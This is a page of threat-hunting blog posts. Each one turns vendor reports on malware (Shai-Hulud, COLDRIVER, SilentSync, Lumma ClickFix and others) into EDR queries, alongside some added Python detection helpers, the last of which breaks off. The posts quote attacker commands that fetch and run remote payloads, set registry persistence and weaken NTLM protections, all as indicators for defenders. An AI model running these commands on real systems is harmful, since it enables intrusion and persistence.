Posts

Showing posts from September, 2025

273. That's How PDB Paths Help to Uncover Malicious Files

Hello everyone! Let's look at a slightly less common way to identify suspicious and malicious software: analyzing program database (PDB) paths. In some cases the adversary really wants us to understand their goals and find the malware. Let's look at an example: a Bookworm malware sample. According to the report, it has the following PDB path:

C:\Users\hack\Documents\WhiteFile\LTDIS13n\Release\LTDIS13n.pdb

Yes, "hack". So, if your EDR solution collects information about PDB paths, this may be a good detection opportunity:

event_type: "processcreatewin" AND proc_file_pdb_path: "hack"

Also, make sure to check the report to see how to use the Unit 42 Attribution Framework in practice. See you tomorrow!
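The PDB path lives in a CodeView "RSDS" record that the PE debug directory points at: a 4-byte signature, a 16-byte GUID, a 4-byte age and a NUL-terminated path. The following is an added example (not code from the post or from Unit 42) that parses such a record and flags path components that rarely occur in legitimate build trees; the GUID and the extra tokens besides "hack" are constructed for illustration, and the sample path is the Bookworm one quoted above.

```python
import struct
import uuid

# CodeView RSDS record (CV_INFO_PDB70): "RSDS" + GUID (16, little-endian layout)
# + age (uint32) + NUL-terminated PDB path.
RSDS_HEADER_LEN = 24


def build_rsds(pdb_path: str, age: int = 1) -> bytes:
    """Build a constructed RSDS record so the parser can be exercised offline."""
    guid = uuid.UUID("11111111-2222-3333-4444-555555555555")  # constructed GUID
    return (b"RSDS" + guid.bytes_le + struct.pack("<I", age)
            + pdb_path.encode("latin-1") + b"\x00")


def parse_rsds(blob: bytes) -> dict:
    """Parse an RSDS record into its GUID, age and PDB path."""
    if len(blob) < RSDS_HEADER_LEN or blob[:4] != b"RSDS":
        raise ValueError("not an RSDS CodeView record")
    guid = uuid.UUID(bytes_le=bytes(blob[4:20]))
    age = struct.unpack_from("<I", blob, 20)[0]
    end = blob.find(b"\x00", RSDS_HEADER_LEN)
    path = blob[RSDS_HEADER_LEN:end if end != -1 else len(blob)]
    return {"guid": str(guid), "age": age,
            "pdb_path": path.decode("latin-1", "replace")}


# Path components that rarely appear in legitimate build trees. "hack" is the
# token from the Bookworm sample; the others are constructed additions.
SUSPICIOUS_TOKENS = ("hack", "malware", "trojan", "inject", "payload")


def suspicious_pdb_tokens(pdb_path: str) -> list:
    """Return the suspicious tokens found in any component of the PDB path."""
    components = pdb_path.lower().replace("/", "\\").split("\\")
    return sorted({tok for tok in SUSPICIOUS_TOKENS
                   for comp in components if tok in comp})


def triage(blob: bytes) -> dict:
    """Parse a record and attach the suspicious tokens found in its path."""
    rec = parse_rsds(blob)
    rec["suspicious"] = suspicious_pdb_tokens(rec["pdb_path"])
    return rec


if __name__ == "__main__":
    sample = build_rsds(
        r"C:\Users\hack\Documents\WhiteFile\LTDIS13n\Release\LTDIS13n.pdb")
    print(triage(sample))
```

On a real binary the same record is reachable through the debug directory (for example, pefile exposes it under DIRECTORY_ENTRY_DEBUG); the triage logic above is what turns the extracted path into the detection the post describes.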

272. Here's Another Interesting Staging Folder You Can Use for Hunting

Hello everyone! As you know, in some cases adversaries choose very interesting staging folders to store their toolset on the compromised system. This fact, of course, may provide us with hunting opportunities! Let's look at CountLoader. According to the report, it has the following capabilities, among others:

Download a file to the %userprofile%\Music\ directory and execute it.
Download a DLL to the %userprofile%\Music\ directory and execute it with rundll32.exe.
Download an MSI file to the %userprofile%\Music\ directory and execute it with msiexec.exe.

First, we can hunt for any executions from the Music folder:

event_type: "processcreatewin" AND proc_file_path: "music"

Second, we can hunt for rundll32.exe or msiexec.exe executing suspicious files from the Music folder:

event_type: "processcreatewin" AND proc_file_path: ("rundll32.exe" OR "msiexec.exe") AND cmdline: "music"

See you tomorrow!

271. Does an Adversary Need to Install an RMM?

Hello everyone! Adversaries, especially ransomware gangs, often abuse legitimate RMMs. But do they need to bring such software with them? In some cases they don't! For example, in this case covered by Barracuda, Akira ransomware affiliates got access to the Datto RMM tool's management console and used it to execute the attack. So it's always a good idea to hunt for abnormal RMM-related behavior. To find Datto RMM, for example, you can look for files signed accordingly:

event_type: "processcreatewin" AND proc_file_sig: "datto"

Also, you can always look for Datto-related domain resolutions:

event_type: "dnsreqwin" AND dns_rname: "rmm.datto.com"

See you tomorrow!

270. Hunting for Shai-Hulud

Hello everyone! I'm sure you've already heard about Shai-Hulud, a self-replicating supply-chain worm discovered in mid-September 2025. Let's look at some of its behaviors and transform them into hunting queries! The first behavior that caught my attention was abusing trufflehog to look for sensitive data in the filesystem:

trufflehog filesystem . --json --results=verified

We can easily transform it into a hunting query:

event_type: ("processcreatemac" OR "processcreatenix") AND proc_file_name: "trufflehog" AND cmdline: ("filesystem" AND "json" AND "results" AND "verified")

Another interesting behavior is related to sensitive data exfiltration. The adversary abused webhook[.]site to achieve it, and it's another hunting opportunity:

event_type: ("dnsreqmac" OR "dnsreqnix") AND dns_rname: "webhook.site"

See you tomorrow!

269. That's How Adversaries Abuse Features of Winlogon

Hello everyone! Today we'll look at another persistence mechanism, which you don't see ITW very often. I'm talking about the following technique: Boot or Logon Autostart Execution: Winlogon Helper DLL (T1547.004). According to this report, the adversary modified the Winlogon key in order to achieve persistence:

reg add '"hkcu\software\microsoft\windows nt\currentversion\winlogon'" /f /v Shell /t REG_SZ /d '"$($sv.Replace('"', '\"'))'""

Such a registry modification enables the malicious script to run at every user login along with explorer.exe. At the same time, it's a detection opportunity for us:

event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("add" AND "winlogon" AND "shell")

See you tomorrow!

268. Hunting for COLDRIVER

Hello everyone! Today we'll look into another great report by Zscaler. This time it's on COLDRIVER (also known as Star Blizzard, Callisto, and UNC4057), and it's full of detection and hunting ideas! The threat actor added ClickFix to their arsenal, but leveraged rundll32.exe instead of the common cmd.exe, powershell.exe and mshta.exe:

rundll32.exe \\captchanom[.]top\check\machinerie.dll,verifyme

Here we can hunt for rundll32.exe executing DLLs located on .top domains (you can experiment with other TLDs, of course; and yes, I love hunting for rundll32.exe abuse):

event_type: "processcreatewin" AND proc_file_path: "rundll32.exe" AND cmdline: *top*

The threat actors used Logon Script (T1037.001) for persistence:

reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "powershell -WindowStyle Hidden -ep bypass \"%APPDATA%\Microsoft\Windows\FvFLcsr23.ps1\" \"7eHgxjgbBs3gHdkgx9AsRC\"" /f%

And yes, it's ano...

267. Hunting for PteroEffigy

Hello everyone! Let's keep digging into the report on the Gamaredon and Turla collaboration. This time we'll look at another Gamaredon malware: PteroEffigy. PteroEffigy is another PowerShell-based downloader, and it also abuses a legitimate web service. But unlike PteroGraphin, it leverages api.gofile[.]io instead of telegra[.]ph. Of course, we can convert this knowledge into a hunting query:

event_type: "dnsreqwin" AND dns_rname: "gofile.io" AND proc_file_name: "powershell.exe"

See you tomorrow!

266. Hunting for PteroGraphin

Hello everyone! ESET released a report on a potential collaboration between two notorious threat actors: Gamaredon and Turla. So let's look at some hunting opportunities. According to the report, Turla leveraged Gamaredon's downloaders to deliver its own malware. Gamaredon's downloaders, for example PteroGraphin, are PowerShell-based and use telegra[.]ph for storing the payloads, which enables us to hunt for similar behaviors:

event_type: "dnsreqwin" AND dns_rname: "telegra.ph" AND proc_file_name: "powershell.exe"

See you tomorrow!

265. Hunting for Another Legitimate Tool Akira Uses for Exfiltration

Hello everyone! Ransomware gangs have an almost countless arsenal of legitimate tools, which help them solve various problems and evade defenses. Let's look at another tool they use for Exfiltration to Cloud Storage (T1567.002). We'll look into the report on Akira ransomware. According to it, the gang leveraged the following legitimate tools for exfiltration:

WinSCP
FileZilla
Rclone
Bitvise SSH Client

The first three are quite common, and most likely already in your threat hunting library. But what about the last one, Bitvise SSH Client? It may be an interesting target:

event_type: "processcreatewin" AND proc_file_productname: "Bitvise SSH Client"

See you tomorrow!

264. Hunting for SnakeDisk

Hello everyone! IBM uncovered another malware family they called SnakeDisk, which belongs to the notorious Mustang Panda (or Horned Werewolf, as we track it). It leverages a very interesting technique: Replication Through Removable Media (T1091). The malware is a USB worm, so its behaviors include moving files and executables located on external drives:

robocopy <drive_letter>:\ <drive_letter>:\<urd>\<uud>\ /XD "<drive_letter>:\<urd>\" /XF "<drive_letter>:\<unendl_org>" /XF "<drive_letter>:\<usb_volumename>.exe" /XD "System Volume Information" /E  /MOVE

Let's hunt for robocopy moving files (/MOVE option) with some files and directories excluded (/XD and /XF options):

event_type: "processcreatewin" AND proc_file_path: "robocopy.exe" AND cmdline: ("xd" AND "xf" AND "move")

See you tomorrow!
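The query above matches "xd", "xf" and "move" as substrings anywhere in the command line, so a path such as C:\Projects\MoveXD\xfer would match too. The following is an added example (not the post's code and not part of any EDR product) that splits a Windows command line the way CommandLineToArgvW does and then checks the actual robocopy switches, which removes that class of false positive. Both sample command lines are constructed.

```python
import ntpath


def split_windows_cmdline(cmdline: str) -> list:
    """Split a command line using the CommandLineToArgvW rules: whitespace
    separates arguments, double quotes group, 2n backslashes before a quote
    become n backslashes, 2n+1 become n backslashes plus a literal quote."""
    args, cur, in_quotes, have_arg, i, n = [], [], False, False, 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == "\\":
            j = i
            while j < n and cmdline[j] == "\\":
                j += 1
            count = j - i
            if j < n and cmdline[j] == '"':
                cur.append("\\" * (count // 2))
                if count % 2:
                    cur.append('"')          # escaped literal quote
                else:
                    in_quotes = not in_quotes
                i = j + 1
            else:
                cur.append("\\" * count)     # backslashes not before a quote are literal
                i = j
            have_arg = True
        elif c == '"':
            in_quotes = not in_quotes
            have_arg = True
            i += 1
        elif c in " \t" and not in_quotes:
            if have_arg:
                args.append("".join(cur))
                cur, have_arg = [], False
            i += 1
        else:
            cur.append(c)
            have_arg = True
            i += 1
    if have_arg:
        args.append("".join(cur))
    return args


def substring_hunt(cmdline: str) -> bool:
    """The post's query as a substring check: cmdline contains xd, xf and move."""
    low = cmdline.lower()
    return all(tok in low for tok in ("xd", "xf", "move"))


def robocopy_move_with_exclusions(cmdline: str):
    """Return switch facts for a robocopy command line, or None if it is not robocopy.
    'hit' is True only when /MOVE is combined with at least one /XD or /XF switch."""
    argv = split_windows_cmdline(cmdline)
    if not argv or ntpath.basename(argv[0]).lower() not in ("robocopy", "robocopy.exe"):
        return None
    switches = {a.upper() for a in argv[1:] if a.startswith("/")}
    return {
        "argv": argv,
        "move": "/MOVE" in switches,
        "excludes_dirs": "/XD" in switches,
        "excludes_files": "/XF" in switches,
        "hit": "/MOVE" in switches and ("/XD" in switches or "/XF" in switches),
    }


# Constructed samples: one true positive, one substring-only false positive.
TRUE_POSITIVE = r'robocopy E:\ E:\data\sync\ /XD "System Volume Information" /XF "E:\readme.txt" /E /MOVE'
FALSE_POSITIVE = r"C:\Windows\System32\robocopy.exe C:\Projects\MoveXD\xfer C:\Backup /E"

if __name__ == "__main__":
    for sample in (TRUE_POSITIVE, FALSE_POSITIVE):
        print(substring_hunt(sample), robocopy_move_with_exclusions(sample)["hit"])
```

Note that the page's own sample ends a quoted argument with a backslash (/XD "<drive_letter>:\<urd>\"); under the rules above that backslash escapes the closing quote, which is exactly the kind of quirk a substring query never sees and an argv-based check has to handle.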

263. Hunting for PyPI Packages Delivering SilentSync RAT

Hello everyone! Today we'll look inside a Zscaler report and at some behaviours we can use to hunt for malicious PyPI packages delivering SilentSync RAT. One more time the adversary leveraged typosquatting of a legitimate package, this time sisa, so a victim would download it instead of the legitimate one. The uncovered malicious packages, sisaws and secmeasure, retrieved the RAT from Pastebin using the following command:

curl -sL https://pastebin[.]com/raw/jaH2uRE1 -o %TEMP%\\helper.py && python %TEMP%\\helper.py

Here we have at least two hunting opportunities. First, we can hunt for cURL retrieving files from Pastebin:

event_type: "processcreatewin" AND proc_file_path: "curl.exe" AND cmdline: "pastebin.com"

Second, running suspicious files from a temporary folder with the Python interpreter:

event_type: "processcreatewin" AND proc_file_path: "python.exe" AND cmdline: "temp"

See you tomorrow!

262. That's How Adversaries Disable Warning Messages

Hello everyone! Let's look at another interesting Modify Registry (T1112) example. This time it's related to warning messages, which may alert the victim. According to this report on CountLoader, the malware changes the registry value "MaxScriptStatements" under "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Styles\\" to "10000000". By doing this, the adversary likely attempts to bypass the warning messages thrown by MSHTA when long scripts are executed. At the same time, for us it's another hunting opportunity:

event_type: "registryvaluesetwin" AND reg_key_path: "MaxScriptStatements"

See you tomorrow!

261. Another Legitimate Web Service Abused by APT28

Hello everyone! Adversaries often abuse legitimate tools, but the same can be said about web services. Today we'll look at how APT28 leveraged Web Service: Bidirectional Communication (T1102.002). According to this report, the group leveraged BeardShell malware, which used an icedrive account as a C2 channel. It's not the first time a threat actor has abused a web service, but I haven't seen this one before. As always, we can look for any suspicious network connections related to it:

event_type: "dnsreqwin" AND dns_rname: "icedrive.net"

See you tomorrow!

260. That's How Bloody Wolf Abuses Telegram for Exfiltration

Hello everyone! Today we'll keep looking at Bloody Wolf, focusing on how the adversary uses the following technique: Exfiltration Over Web Service (T1567). If we look into this report, we can see that the adversary used malicious JAR files to install NetSupport on the target system. The file also sent the name of the compromised system to a dedicated Telegram chat. And, of course, we can look for similar behavior:

event_type: "dnsreqwin" AND dns_rname: "telegram.org" AND proc_file_path: "java.exe"

See you tomorrow!

259. That's How Bloody Wolf Abuses WMI for Discovery

Hello everyone! As I'm speaking at KazHackStan this week, I'm going to share some insights regarding local threats. Let's start with how Bloody Wolf used Windows Management Instrumentation (T1047). The adversary leveraged STRRAT, which abused WMI for reconnaissance:

cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_logicaldisk get volumeserialnumber /format:list"
cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get caption,OSArchitecture /format:list"
cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get version /format:list"
cmd.exe /c "wmic /node:localhost /namespace:'\\root\securitycenter' path antivirusproduct get displayname /format:list"

Of course, it's a great target for hunting, as always:

event_type: "processcreatewin" AND proc_file_path: "wmic.exe" AND cmdline: ("win32_logicaldisk" OR "w...

258. That's How Adversaries Abuse WMI for Software Discovery

Hello everyone! Let's talk about discovery one more time, as this is one of the best tactics to catch the bad guys before it's too late. This time we'll look at Software Discovery (T1518). So, according to this report, the adversary leveraged WMI for browser-related process enumeration:

C:\windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_Process | Where-Object { $_.Name -eq 'chrome.exe' }""
C:\windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_Process | Where-Object { $_.Name -eq 'msedge.exe' }""

Yes, it's another great target for your threat hunting mission:

event_type: "processcreatewin" AND cmdline: ("Get-WmiObject" AND "Win32_Process") AND cmdline: ("chrome.exe" OR "msedge.exe")

See you tomorrow!

257. Adversaries Abuse ITarian for Command and Control

Hello everyone! Adversaries keep experimenting with various RMM tools. So, today we'll look at another example of Remote Access Tools: Remote Desktop Software (T1219.002). According to a Red Canary report, this time threat actors abused ITarian. Despite the fact that the installer dropped the ITarian executable to a legitimate location, I think it's better to focus on its metadata, for example CompanyName, so we can hunt for renamed versions of this RMM as well:

event_type: "processcreatewin" AND proc_file_companyname: "itarian"

See you tomorrow!

256. That's How Adversaries Abuse PowerShell Cmdlets

Hello everyone! I've brought you another PowerShell (T1059.001) procedure you may use in your threat hunting missions! Let's look inside a new report on Head Mare (we track this cluster as Rainbow Hyena). The adversary downloaded archives with additional backdoors from a remote server and used PowerShell to expand them:

powershell expand-archive -force -path C:\ProgramData\YandexUpdate\update.zip -destinationpath C:\ProgramData\YandexUpdate\

The threat actors chose ProgramData as a staging folder, so we can use it to build the query and look for suspicious events:

event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: ("expand-archive" AND "programdata")

See you tomorrow!

255. Adversaries Use Azure Functions as C2

Hello everyone! Yes, another legitimate service is abused by adversaries as a C2 channel. And this time it's Azure Functions. Azure Functions is a serverless, event-driven platform that lets you run small pieces of code (functions) in the cloud without provisioning or managing servers. And according to this report, it's now used by threat actors as C2. As always, we can hunt for such behavior focusing on suspicious processes:

event_type: "dnsreqwin" AND dns_rname: "azurewebsites.net"

See you tomorrow!

254. That's How Adversaries Modify Registry to Weaken Security

Hello everyone! As you know, adversaries may solve lots of problems by interacting with the registry. So today we'll look at a few more examples of Modify Registry (T1112). And one more time it's going to be The Gentlemen. For example, the adversary leveraged reg.exe to allow unrestricted NTLM authentication:

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 /v RestrictSendingNTLMTraffic /t REG_DWORD /d 0 /f

And we can look for such behaviors, of course:

event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("add" AND "MSV1_0")

Another example is enabling Restricted Admin:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Why not hunt for it:

event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("add" AND "DisableRestrictedAdmin")

See you tomorrow!

253. Ransomware Gangs Abuse PowerRun for Privilege Escalation

Hello everyone! Today we'll look at another legitimate tool which is used by ransomware gangs for Privilege Escalation (TA0004). According to this report, The Gentlemen ransomware gang leveraged PowerRun to execute high-privilege operations, for example to terminate security software. It enables adversaries to run various tools under SYSTEM or even TrustedInstaller permissions. For example, we can detect its executions:

event_type: "processcreatewin" AND proc_file_productname: "powerrun"

Another detection opportunity is the INI file creation event:

event_type: "filecreatewin" AND file_name: "PowerRun.ini"

See you tomorrow!

252. Is APT37 Noisy Enough to Be Detected?

Hello everyone! If you're reading this blog often, you are 100% sure that most adversaries are extremely noisy. And yes, today we'll look at another noisy example, which belongs to APT37. The adversary leveraged malicious CHM files, which executed multiple quite interesting commands. For example, once again the adversary abused reg.exe for persistence:

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OnedriveStandaloneUpdater /t REG_SZ /d

Why not hunt for such suspicious registry modification events:

event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("add" AND "run")

Next it runs PowerShell to download a malicious HTA file and execute it via mshta.exe:

Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 473925 2.2.2.2 || mshta http://[redacted].co.kr/files/2023/12/01/1.html" /f

From a threat hunting perspective, it's always a good idea to hunt for PowerShel...

251. That's How MostereRAT Abuses Ruby

Hello everyone! I think everyone has already got used to the fact that adversaries abuse Python. But there are still more interesting examples of Command and Scripting Interpreter (T1059)! For example, according to this report, MostereRAT leveraged a Ruby script to execute one of the stages:

C:\ProgramData\Windows\ruby\ruby.exe -e "system('start C:\ProgramData\Windows\svchost.exe C:\ProgramData\Windows\svchost.db channel-8df91be7c24e');exit();"

As you can see, ruby.exe runs from an uncommon path. You can use this and, for example, exclude the paths that are common in your environment to build your hunting query:

event_type: "processcreatewin" AND proc_file_originalfilename: "ruby.exe" AND proc_file_path: "programdata"

See you tomorrow!

250. CastleRAT Abuses Steam Community Pages to Store C2 Addresses

Hello everyone! The Dead Drop Resolver (T1102.001) technique is becoming more and more popular among adversaries. Let's look at another example: how threat actors abuse Steam Community pages. We'll look at CastleRAT. Since August 2025, the malware has leveraged Steam Community pages as C2 dead drops. This means we can hunt for suspicious resolutions of steamcommunity[.]com. Of course, you should not forget about exclusions, so here's what to exclude based on my telemetry:

event_type: "dnsreqwin" AND dns_rname: "steamcommunity.com" AND NOT proc_file_path: ("steam.exe" OR "steam" OR "kaspersky" OR "windows defender" OR "networkservice.exe" OR "svchost.exe" OR "Counter Strike" OR "McAfee" OR "eaanticheat.gameservice.exe" OR "WinProxy" OR "NetLimiter" OR "cs.exe" OR "rave.exe" OR "ScumLauncher.exe" OR "ExpressConnect...
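Every post on this page expresses its hunt in the same small query language: field: "term" pairs, grouped terms in parentheses, AND / OR / NOT, and a bare *term* wildcard, all matched case-insensitively as substrings. The following is an added example (not the blog's or any EDR vendor's code) of a tokenizer and recursive-descent evaluator for that syntax, so the queries from post 272 (Music folder staging) and post 250 (the steamcommunity.com exclusion list) can be run over telemetry offline; the event records are constructed, and the exact matching semantics of the real backend are an assumption.

```python
import re

# Constructed sample telemetry; field names mirror the queries on this page.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\Music\upd.dll,Start"},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Users\alice\Music\setup.exe",
     "cmdline": r'"C:\Users\alice\Music\setup.exe" /silent'},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Windows\Temp\patch.msi /qn"},
    {"event_type": "dnsreqwin",
     "proc_file_path": r"C:\Program Files\Steam\steam.exe",
     "dns_rname": "steamcommunity.com"},
    {"event_type": "dnsreqwin",
     "proc_file_path": r"C:\Users\alice\AppData\Local\Temp\upd.exe",
     "dns_rname": "steamcommunity.com"},
]

# One token per match: "(", ")", a quoted term, a field name followed by ":",
# or a bare word (AND / OR / NOT / wildcard terms such as *top*).
TOKEN_RE = re.compile(r'\s*(?:(\()|(\))|"([^"]*)"|([A-Za-z_]\w*):|([^\s()]+))')


def tokenize(query: str) -> list:
    """Turn a query string into (kind, value) tokens."""
    pos, tokens, query = 0, [], query.strip()
    while pos < len(query):
        m = TOKEN_RE.match(query, pos)
        if not m:
            raise ValueError(f"bad token near {query[pos:pos + 10]!r}")
        pos = m.end()
        lp, rp, quoted, field, bare = m.groups()
        if lp:
            tokens.append(("LP", None))
        elif rp:
            tokens.append(("RP", None))
        elif quoted is not None:
            tokens.append(("TERM", quoted))
        elif field:
            tokens.append(("FIELD", field))
        elif bare.upper() in ("AND", "OR", "NOT"):
            tokens.append((bare.upper(), None))
        else:
            tokens.append(("TERM", bare))
    return tokens


class Parser:
    """Builds a predicate over an event dict. Grammar: or_expr := and_expr (OR and_expr)*;
    and_expr := not_expr (AND not_expr)*; not_expr := NOT not_expr | primary;
    primary := '(' or_expr ')' | FIELD primary | TERM. A FIELD binds the field
    name for the value (or grouped values) that follows it."""

    def __init__(self, tokens):
        self.toks, self.i = tokens, 0

    def peek(self):
        return self.toks[self.i][0] if self.i < len(self.toks) else None

    def take(self):
        tok = self.toks[self.i]
        self.i += 1
        return tok

    def parse(self):
        node = self.or_expr(None)
        if self.peek() is not None:
            raise ValueError("trailing tokens")
        return node

    def or_expr(self, field):
        left = self.and_expr(field)
        while self.peek() == "OR":
            self.take()
            left = (lambda l, r: lambda e: l(e) or r(e))(left, self.and_expr(field))
        return left

    def and_expr(self, field):
        left = self.not_expr(field)
        while self.peek() == "AND":
            self.take()
            left = (lambda l, r: lambda e: l(e) and r(e))(left, self.not_expr(field))
        return left

    def not_expr(self, field):
        if self.peek() == "NOT":
            self.take()
            inner = self.not_expr(field)
            return lambda e: not inner(e)
        return self.primary(field)

    def primary(self, field):
        kind, val = self.take()
        if kind == "LP":
            node = self.or_expr(field)
            if self.take()[0] != "RP":
                raise ValueError("expected )")
            return node
        if kind == "FIELD":
            return self.primary(val)
        if kind == "TERM":
            if field is None:
                raise ValueError(f"term {val!r} has no field")
            needle = val.strip("*").lower()   # *term* wildcard == substring match
            return lambda e, f=field, n=needle: n in str(e.get(f, "")).lower()
        raise ValueError(f"unexpected token {kind}")


def hunt(query: str, events: list) -> list:
    """Return the events that satisfy the query."""
    matcher = Parser(tokenize(query)).parse()
    return [e for e in events if matcher(e)]


if __name__ == "__main__":
    q = 'event_type: "processcreatewin" AND proc_file_path: ("rundll32.exe" OR "msiexec.exe") AND cmdline: "music"'
    for hit in hunt(q, SAMPLE_EVENTS):
        print(hit["cmdline"])
```

Because every term is a substring test, this evaluator reproduces the page's semantics and also its blind spots: "music" in proc_file_path matches any path containing that string, and the NOT exclusion list in post 250 suppresses an event as soon as any listed fragment appears in the process path.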

249. Adversaries Use Active Setup for Persistence

Hello everyone! Today we'll talk about another persistence mechanism which is not commonly used by adversaries. I'm talking about Boot or Logon Autostart Execution: Active Setup (T1547.014). I spotted threat actors using it while reading this report on NightshadeC2. The adversary created a key under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and set a malicious value for StubPath. The key is commonly used by web browser updaters and some other legitimate software, so make sure to tune the query properly:

event_type: "registryvaluesetwin" AND reg_key_path: ("Active Setup" AND "StubPath") AND NOT reg_value_data: ("edge" OR "chrome" OR "yandex" OR "brave" OR "citrixenterprisebrowser" OR "acrobat" OR "chromium" OR "contentreader")

See you tomorrow!

248. That's How Adversaries Abuse Netsh for Discovery

Hello everyone! Stealers and discovery, one more time. This time we'll look at Stealerium and learn how it misuses netsh.exe for System Network Configuration Discovery: Wi-Fi Discovery (T1016.002), and, of course, how to hunt for such activity. So, if we look into this report, we can see that the stealer used netsh.exe to collect information about Wi-Fi networks:

netsh wlan show profile
netsh wlan show networks mode=bssid

Discovery commands are always great targets for threat hunting; just look for suspicious parent processes. Ok, let's build a query:

event_type: "processcreatewin" AND proc_file_path: "netsh.exe" AND cmdline: (("wlan" AND "show") AND ("networks" OR "profile"))

See you tomorrow!

247. Another Hunting Opportunity from ClickFix

Hello everyone! We've already looked at many ClickFix variations, but adversaries keep experimenting with this technique, so we get more and more detection and hunting opportunities. This time we'll look at another example used by threat actors to deliver Lumma stealer. The victim is expected to run the following command:

cmd.exe /c start "" /min cmd /k "curl -s hXXp://85.209.129[.]105:2020/19 | cmd && exit; capcha code 74585

Here we can see that the adversary used command line arguments to start the download process with the new window minimized. You won't often see this used legitimately, so we can use it to create a hunting query:

event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("start" AND "min")

See you tomorrow!

246. That's How TinyLoader Maintains Persistence

Hello everyone! Recently I spotted another persistence technique I don't often see used by adversaries. I'm talking about the following technique: Change Default File Association (T1546.001). According to this report, TinyLoader modified the following registry key to hijack how Windows handles text files:

HKEY_CLASSES_ROOT\txtfile\shell\open\command

This allows the malware to be executed every time a victim opens a .txt file. So, we can hunt for registry modification events related to this key:

event_type: "registryvaluesetwin" AND reg_key_path: "txtfile\\shell\\open\\command"

See you tomorrow!
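The registry hunts on this page (Winlogon Shell in post 269, UserInitMprLogonScript in post 268, MaxScriptStatements in post 262, RestrictSendingNTLMTraffic and DisableRestrictedAdmin in post 254, Active Setup StubPath in post 249, and the txtfile handler in post 246) all fire on the modification event. When you are handed a host after the fact and the events are gone, the same knowledge can be applied to the registry's current state. The following is an added example (not the blog's code) of such an audit; the readers are injected so it runs offline against a constructed registry and, on Windows, against the real one through winreg. The Active Setup exclusion list is the one from post 249; treating notepad as the expected .txt handler and any HKCU Winlogon Shell other than plain explorer.exe as suspicious are assumptions.

```python
import sys

ACTIVE_SETUP_BASE = r"SOFTWARE\Microsoft\Active Setup\Installed Components"
ACTIVE_SETUP_EXCLUSIONS = ("edge", "chrome", "yandex", "brave", "citrixenterprisebrowser",
                           "acrobat", "chromium", "contentreader")

# (hive, key, value name, predicate on the value (None when absent), description)
CHECKS = [
    ("HKCU", r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell",
     lambda v: v is not None and str(v).strip().lower() != "explorer.exe",
     "per-user Winlogon Shell is not plain explorer.exe"),
    ("HKCU", r"Environment", "UserInitMprLogonScript",
     lambda v: v is not None, "logon script configured"),
    ("HKCU", r"Software\Microsoft\Internet Explorer\Styles", "MaxScriptStatements",
     lambda v: v is not None, "MSHTA script statement limit overridden"),
    ("HKLM", r"SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0", "RestrictSendingNTLMTraffic",
     lambda v: v == 0, "outbound NTLM traffic unrestricted"),
    ("HKLM", r"SYSTEM\CurrentControlSet\Control\Lsa", "DisableRestrictedAdmin",
     lambda v: v == 0, "Restricted Admin mode enabled"),
    ("HKCR", r"txtfile\shell\open\command", "",   # "" reads the (Default) value
     lambda v: v is not None and "notepad" not in str(v).lower(),
     ".txt open command no longer points at notepad (assumed default)"),
]


def audit_registry(read_value, list_subkeys) -> list:
    """Return (location, value, reason) triples for every check that fires."""
    findings = []
    for hive, key, name, is_suspicious, why in CHECKS:
        value = read_value(hive, key, name)
        if is_suspicious(value):
            findings.append((f"{hive}\\{key}\\{name or '(Default)'}", value, why))
    # Active Setup: every component's StubPath that is not a known updater.
    for sub in list_subkeys("HKLM", ACTIVE_SETUP_BASE):
        stub = read_value("HKLM", ACTIVE_SETUP_BASE + "\\" + sub, "StubPath")
        if stub and not any(x in str(stub).lower() for x in ACTIVE_SETUP_EXCLUSIONS):
            findings.append((f"HKLM\\{ACTIVE_SETUP_BASE}\\{sub}\\StubPath", stub,
                             "Active Setup StubPath outside the exclusion list"))
    return findings


# Constructed registry snapshot: {(hive, key): {value name: data}}.
FAKE_REGISTRY = {
    ("HKCU", r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon"):
        {"Shell": r"explorer.exe,C:\Users\Public\upd.cmd"},
    ("HKLM", r"SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"): {"RestrictSendingNTLMTraffic": 0},
    ("HKLM", ACTIVE_SETUP_BASE): {},
    ("HKLM", ACTIVE_SETUP_BASE + r"\{constructed-edge}"):
        {"StubPath": r"C:\Program Files (x86)\Microsoft\Edge\Application\setup.exe --configure-user-settings"},
    ("HKLM", ACTIVE_SETUP_BASE + r"\{constructed-unknown}"): {"StubPath": r"C:\Users\Public\svc.exe"},
}


def fake_readers(registry):
    """Readers over the constructed snapshot, same interface as the winreg ones."""
    def read_value(hive, key, name):
        return registry.get((hive, key), {}).get(name)

    def list_subkeys(hive, key):
        prefix = key + "\\"
        return sorted({k[len(prefix):].split("\\")[0]
                       for (h, k) in registry if h == hive and k.startswith(prefix)})
    return read_value, list_subkeys


def winreg_readers():
    """Readers over the live registry; absent keys or values read as None."""
    import winreg
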